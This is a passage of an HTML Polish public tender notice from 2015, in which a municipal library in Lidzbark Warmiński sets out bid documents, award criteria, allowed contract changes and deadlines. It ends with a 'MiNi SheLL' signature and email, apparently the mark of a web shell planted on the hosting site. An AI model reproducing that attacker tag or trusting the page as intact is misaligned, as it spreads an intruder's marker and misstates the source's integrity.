<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Formularz Oferty, sporządzony według wzoru stanowiącego załącznik nr 1 do SIWZ,
b)  Kosztorys sporządzony metodą kalkulacji uproszczonej,
c)  	Stosowne Pełnomocnictwo(a) - w przypadku, gdy uprawnienie do podpisania oferty 
      nie wynika bezpośrednio z dokumentów załączonych do oferty. W przypadku 	Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dokument 	ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie 	zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie 	niniejszego zamówienia publicznego.
d) 	kopię dowodu wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95.00</li>
<li>2 - Okres gwarancji jakości - 5.00</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany w treści umowy w stosunku do treści oferty mogą być dokonane na skutek 
zaistnienia okoliczności niemożliwych wcześniej do przewidzenia, a w szczególności:
1) okoliczności niezależne od stron uniemożliwiające realizację przedmiotu umowy 
    w terminie przewidzianym na zakończenie robót, a w szczególności:
 a)  wystąpienie warunków atmosferycznych odbiegających od typowych,    
      uniemożliwiających prowadzenie robót budowlanych, przeprowadzenie prób                         
      i sprawdzeń, dokonywanie odbiorów, 
 b)  wystąpienie klęski żywiołowej, 
 c)  zmiana zakresu robót budowlanych, wystąpienie robót zamiennych  lub dodatkowych 
     od wykonania których uzależnione jest wykonanie zamówienia podstawowego,
 d) wystąpienie przestojów robót budowlanych spowodowanych wstrzymaniem wykonania 
     robót budowlanych przez uprawnione  organy, z przyczyn nie wynikających z winy 
    stron umowy,
2) W przypadku zaistnienia okoliczności, o których mowa w ust. 1 pkt 1 termin realizacji 
    przedmiotu umowy może ulec wydłużeniu o okres trwania tych okoliczności lub o czas  
    niezbędny do należytego wykonania przedmiotu umowy.
2. Zmiana umowy może również nastąpić w przypadku:
	1)	zmiany przepisów prawa mających wpływ na treść umowy.
	2)	zaistnienia konieczności wykonania robót zamiennych potwierdzonych przez osoby  
  	      uprawnione, cena ryczałtowa może ulec zmianie o różnicę wartości robót 
          (materiałów) zamiennych ustalonych kosztorysem powykonawczym zatwierdzonym 
          przez Zamawiającego,  a wartością ryczałtową tego zakresu robót, zamiast którego 
          będą wykonywane  roboty (stosowane materiały) zamienne. 
	3)   ograniczenia zakresu robót lub wprowadzenia robót zamiennych o niższej wartości    
	      niż przewidywana w dokumentacji i w ofercie, wysokość wynagrodzenia Wykonawcy 
           zostanie zmniejszona. 
	4)	nie wykonania części  lub całości zamówienia z powodu tego, że wykonanie 
           zamówienia nie leży w interesie publicznym, czego nie można było przewidzieć                     
           w chwili zawarcia umowy, tym przypadku, wysokość wynagrodzenia Wykonawcy 
           zostanie zmniejszona o wartość robót niewykonanych,
    5)    zmiany kierownika budowy lub  kierowników robót lub inspektorów nadzoru 
           inwestorskiego. 
    6)	zmiany osób reprezentujących strony,
    7)	wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie                         
            z  SIWZ,
    8)	zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy   
           na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie zadania 
           lub wytycznych dotyczących realizacji zadania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mbp.lidzbarkwarminski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejska  Biblioteka  Publiczna  im.  M. Kromera  w  Lidzbarku  Warmińskim,
11-100 Lidzbark Warmiński, ul. Ratuszowa 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2015 godzina 12:00, miejsce: Miejska  Biblioteka  Publiczna  im.  M. Kromera  w  Lidzbarku  Warmińskim,
11-100 Lidzbark Warmiński, ul. Ratuszowa 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie jest dofinansowane ze środków finansowych Ministra Kultury i Dziedzictwa Narodowego pochodzących  z  budżetu  państwa w  ramach PROGRAMU  WIELOLETNIEGO KULTURA+ PIORYTET BIBLIOTEKA+ INFRASTRUKTURA BIBLIOTEK.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com